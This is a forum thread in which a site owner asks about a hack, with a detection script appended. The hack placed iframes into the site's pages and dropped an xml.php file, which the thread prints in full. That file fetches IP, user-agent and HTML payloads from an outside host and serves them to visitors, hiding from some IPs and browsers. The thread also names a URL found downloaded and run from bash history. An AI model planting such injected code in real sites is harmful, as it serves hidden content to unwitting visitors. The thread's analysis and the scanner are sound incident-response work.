php - I was just hacked, but I don't know how or more importantly, why. Very odd code injected


edit: work far.

I've found this being downloaded and run in the bash history:

http://notsoft.ru/glib

(safe view)

thanks all


I've noticed the PHP source of my site has been edited. I've no idea how (I've changed passwords since), but what confuses me is why.

In a couple of pages there is an iframe placed, linking to an xml.php file placed in the images directory (the directory accessible htaccess). The code must have been hand placed, as the pages are complex, and to auto-place it without breaking these pages would have been near impossible.

Now the really confusing thing is the contents of the xml.php file; I can see nothing.

Here's the code:

    <?php
    $urlips = "http://mp3magicmag.com/frame/ips.txt"; // url ip's
    $urlhtml = "http://mp3magicmag.com/frame/html.code"; // url html.code
    $urlua = "http://mp3magicmag.com/frame/ua.txt"; // url user agent file

    if(isset($_GET['ping'])){
        echo "status: ping successful!";
        die;
    }
    $ip = $_SERVER['REMOTE_ADDR'];
    // trim the range
    $exips = explode(".", $ip);
    $ip = $exips[0].".".$exips[1].".".$exips[2];

    $ips = file_get_contents($urlips);
    if(strpos(" ".$ips, $ip)){ // if the IP is found in the file, stop the process..
        die;
    }

    $arrua = file($urlua);
    for($ua=0; $ua<count($arrua); $ua++){
        $useragent = trim($arrua[$ua]);
        if(strpos(" ".$_SERVER['HTTP_USER_AGENT'], $useragent)){ // if found in the user agent, stop the process..
            die;
        }
    }

    if(isset($_COOKIE['pingshell'])){ // check whether the cookie exists
        echo @file_get_contents($urlhtml);
    }else{
    ?>
    <script language="javascript">
    function setcookie (name, value, expires, path, domain, secure) {
        document.cookie = name + "=" + escape(value) +
        ((expires) ? "; expires=" + expires : "") +
        ((path) ? "; path=" + path : "") +
        ((domain) ? "; domain=" + domain : "") +
        ((secure) ? "; secure" : "");
    }
    </script>

    <script language="javascript">
    setcookie("pingshell", "12345", "mon, 01-jan-2099 00:00:00 gmt", "/");
    </script>
    <meta http-equiv="refresh" content="2; url=">

    <?php } ?>

Am I missing something, or is this the strangest "hack" ever?? I've done some googling and can't find any reference to this happening before.

right follows.

  1. Checks to see if the script is called with ping; if so, it replies and terminates.
  2. Downloads a list of valid server IPs and checks the request came from one, terminates if not.
  3. Downloads a list of user-agent strings and matches the browser against them to see if it is valid, if not terminates.
  4. If the cookie pingshell has been set, the HTML file is downloaded and displayed to the browser.
  5. Otherwise a cookie script is sent to the browser, setting the pingshell cookie to a dummy value, valid for the entire domain.

Step 4 is the important bit; it looks like a proxy server to retrieve the HTML at the location given. If the link is illegal, it's not good. For marketing purposes though, they can use the URL to serve content, and users click-through data.

Having said that, the code allows a form of access to prescribed IP addresses, so unless it is capturing information first, it seems designed for specific use by specific people.
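
A defender's triage sketch for the pattern in this thread, added here and not part of the original question or answer: it walks a web root and flags PHP files inside asset directories, PHP that echoes content fetched from a remote URL, and iframes whose src is a .php file. The directory names, heuristic labels and the constructed demo tree are assumptions for illustration.

```python
import re
import tempfile
from pathlib import Path

STATIC_DIRS = {"images", "img", "uploads", "css", "js"}  # assumed asset-only dirs
ECHO_FETCH = re.compile(r"echo\s+@?file_get_contents\s*\(", re.I)
HTTP_URL = re.compile(r"""["']https?://""", re.I)
IFRAME_PHP = re.compile(r"""<iframe\b[^>]*\bsrc\s*=\s*["']?[^"'\s>]+\.php\b""", re.I)
SCANNED = {".php", ".phtml", ".inc", ".html", ".htm"}

def scan_file(rel_path, text):
    """Return the names of the heuristics that fire for one file."""
    rel = Path(rel_path)
    hits, dirs = [], {p.lower() for p in rel.parts[:-1]}
    if rel.suffix.lower() in {".php", ".phtml"} and dirs & STATIC_DIRS:
        hits.append("php-in-static-dir")      # e.g. xml.php dropped into images/
    if ECHO_FETCH.search(text) and HTTP_URL.search(text):
        hits.append("echoes-remote-content")  # page body supplied by a remote host
    if IFRAME_PHP.search(text):
        hits.append("iframe-to-php")          # injected frame in a legitimate page
    return hits

def scan_tree(root):
    """Walk a web root and map relative path -> fired heuristics."""
    root, report = Path(root), {}
    for path in sorted(root.rglob("*")):
        if path.is_file() and path.suffix.lower() in SCANNED:
            rel = path.relative_to(root)
            hits = scan_file(rel, path.read_text(errors="replace"))
            if hits:
                report[rel.as_posix()] = hits
    return report

def demo():
    """Build a constructed web root (not real site data) and scan it."""
    files = {
        "index.php": '<h1>Home</h1><iframe src="/images/xml.php" width="1"></iframe>',
        "images/xml.php": '<?php $u = "http://example.invalid/x"; echo @file_get_contents($u); ?>',
        "about.php": "<?php echo 'About us'; ?>",
    }
    with tempfile.TemporaryDirectory() as tmp:
        for name, body in files.items():
            Path(tmp, name).parent.mkdir(parents=True, exist_ok=True)
            Path(tmp, name).write_text(body)
        return scan_tree(tmp)

if __name__ == "__main__":
    for name, hits in demo().items():
        print(f"{name}: {', '.join(hits)}")
```

These are triage heuristics, so a hit is a file to review by hand and compare against a known-good copy, not proof of compromise.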

